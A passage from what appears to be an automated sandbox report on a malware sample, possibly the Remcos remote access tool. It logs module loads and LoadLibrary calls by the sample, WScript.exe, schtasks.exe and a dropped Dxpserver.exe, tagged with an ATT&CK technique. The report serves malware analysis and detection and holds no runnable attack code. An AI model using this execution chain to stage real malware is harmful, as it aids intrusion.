\"PROPSYS.DLL\" at base 73bc0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"OLEAUT32.DLL\" at base 76e90000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"APPHELP.DLL\" at base 74d90000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"CLBCATQ.DLL\" at base 771a0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 69540000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75220000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"SETUPAPI.DLL\" at base 75870000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73bc0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77130000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"PROFAPI.DLL\" at base 74f00000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75310000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"SECUR32.DLL\" at base 74c20000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74f20000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6e1d0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75b90000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 712d0000\n \"WScript.exe\" loaded module \"KERNEL32.DLL\" at base 75220000\n \"WScript.exe\" loaded module \"SXS.DLL\" at base 74df0000\n \"WScript.exe\" loaded module \"DWMAPI.DLL\" at base 73a30000\n \"WScript.exe\" loaded module \"CLBCATQ.DLL\" at base 771a0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 6a900000\n \"WScript.exe\" loaded module \"OLE32.DLL\" at base 76c60000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 75a40000\n \"WScript.exe\" loaded module \"WINTRUST.DLL\" at base 74f70000\n \"WScript.exe\" loaded module \"CRYPTSP.DLL\" at base 748f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74680000\n \"WScript.exe\" loaded module \"ADVAPI32.DLL\" at base 75a40000\n \"WScript.exe\" loaded module \"CRYPTBASE.DLL\" at base 74de0000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6cea0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 75090000\n \"WScript.exe\" loaded module \"IMM32.DLL\" at base 75b70000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6c7b0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6c0c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6b1e0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6b120000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 76c60000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 76dc0000\n \"WScript.exe\" loaded module \"OLEAUT32.DLL\" at base 76e90000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 707b0000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"schtasks.exe\" loaded module \"KERNEL32\" at base 75220000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"schtasks.exe\" loaded module \"SSPICLI.DLL\" at base 74d70000\n \"schtasks.exe\" loaded module \"ADVAPI32.DLL\" at base 75a40000\n \"schtasks.exe\" loaded module \"XMLLITE.DLL\" at base 735c0000\n \"Dxpserver.exe\" loaded module \"KERNEL32.DLL\" at base 75220000\n \"Dxpserver.exe\" loaded module \"ADVAPI32.DLL\" at base 75a40000\n \"Dxpserver.exe\" loaded module \"CRYPTSP.DLL\" at base 748f0000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74680000\n \"Dxpserver.exe\" loaded module \"CRYPTBASE.DLL\" at base 74de0000\n \"Dxpserver.exe\" loaded module \"OLE32.DLL\" at base 76c60000\n \"Dxpserver.exe\" loaded module \"KERNEL32\" at base 75220000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74d90000\n \"Dxpserver.exe\" loaded module \"NTMARTA.DLL\" at base 74350000\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77130000\n \"Dxpserver.exe\" loaded module \"RPCRT4.DLL\" at base 75530000\n \"Dxpserver.exe\" loaded module \"SHELL32.DLL\" at base 75b90000\n \"Dxpserver.exe\" loaded module \"PROPSYS.DLL\" at base 73bc0000\n \"Dxpserver.exe\" loaded module \"COMCTL32.DLL\" at base 73d80000\n \"Dxpserver.exe\" loaded module \"OLEAUT32.DLL\" at base 76e90000\n \"Dxpserver.exe\" loaded module \"APPHELP.DLL\" at base 74d90000\n \"Dxpserver.exe\" loaded module \"CLBCATQ.DLL\" at base 771a0000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 69540000\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75220000\n \"Dxpserver.exe\" loaded module \"SETUPAPI.DLL\" at base 75870000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73bc0000\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77130000\n \"Dxpserver.exe\" loaded module \"PROFAPI.DLL\" at base 74f00000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75310000\n \"Dxpserver.exe\" loaded module \"SECUR32.DLL\" at base 74c20000\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74f20000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SFC.DLL\" at base 72090000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 739a0000\n \"Dxpserver.exe\" loaded module \"DWMAPI.DLL\" at base 73a30000\n \"Dxpserver.exe\" loaded module \"UXTHEME.DLL\" at base 739a0000\n \"Dxpserver.exe\" loaded module \"IMM32.DLL\" at base 75b70000\n \"Dxpserver.exe\" loaded module \"COMCTL32\" at base 73d80000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SFC.DLL\" at base 72080000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6e1d0000\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 75b90000\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 712d0000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6c7c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6b600000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6b1e0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6a390000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6a360000\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 707b0000\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"Dxpserver.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"Dxpserver.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b240000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 707b0000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WScript.exe\" loaded module \"KERNEL32\" at base 75220000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 6a340000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6c7b0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6b1f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6b1c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6a310000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6be10000\n \"remcos.exe\" loaded module \"KERNEL32.DLL\" at base 75220000\n \"remcos.exe\" loaded module \"UXTHEME.DLL\" at base 739a0000\n \"remcos.exe\" loaded module \"IMM32.DLL\" at base 75b70000\n \"remcos.exe\" loaded module \"COMCTL32\" at base 73d80000\n \"remcos.exe\" loaded module \"ADVAPI32.DLL\" at base 75a40000\n \"remcos.exe\" loaded module \"CRYPTSP.DLL\" at base 748f0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74680000\n \"remcos.exe\" loaded module \"CRYPTBASE.DLL\" at base 74de0000\n \"remcos.exe\" loaded module \"OLE32.DLL\" at base 76c60000\n \"remcos.exe\" loaded module \"KERNEL32\" at base 75220000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74d90000\n \"remcos.exe\" loaded module \"NTMARTA.DLL\" at base 74350000\n \"remcos.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77130000\n \"remcos.exe\" loaded module \"RPCRT4.DLL\" at base 75530000\n \"remcos.exe\" loaded module \"SHELL32.DLL\" at base 75b90000\n \"remcos.exe\" loaded module \"PROPSYS.DLL\" at base 73bc0000\n \"remcos.exe\" loaded module \"COMCTL32.DLL\" at base 73d80000\n \"remcos.exe\" loaded module \"OLEAUT32.DLL\" at base 76e90000\n \"remcos.exe\" loaded module \"APPHELP.DLL\" at base 74d90000\n \"remcos.exe\" loaded module \"CLBCATQ.DLL\" at base 771a0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 69540000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73bc0000\n \"remcos.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77130000\n \"remcos.exe\" loaded module \"PROFAPI.DLL\" at base 74f00000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75310000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75220000\n \"remcos.exe\" loaded module \"SETUPAPI.DLL\" at base 75870000\n \"remcos.exe\" loaded module \"SECUR32.DLL\" at base 74c20000\n \"remcos.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74f20000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SFC.DLL\" at base 6d410000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 707b0000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"remcos.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b240000\n \"remcos.exe\" loaded module \"USER32.DLL\" at base 75460000\n \"remcos.exe\" loaded module \"PSAPI.DLL\" at base 75b50000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 72090000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6c7a0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6b4f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6be10000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6b560000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TASKSCHD.DLL\" at base 734f0000\n \"schtasks.exe\" loaded module \"CRYPTBASE.DLL\" at base 74de0000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 739a0000\n \"schtasks.exe\" loaded module \"RPCRT4.DLL\" at base 75530000\n \"schtasks.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77130000\n \"schtasks.exe\" loaded module \"CLBCATQ.DLL\" at base 771a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter Kernel32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003032)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003032)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WScript.exe (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003092)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003092)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002908)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002908)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002908)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002908)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00002908)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Kernel32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\sfc.dll (UID: 00000000-00001212)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %APPDATA%\\adprovider\\Dxpserver.exe (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Kernel32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\sfc.dll (UID: 00000000-00005216)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005116)\n \"Dxpserver.exe\" called \"LoadLibrary\" with a parameter 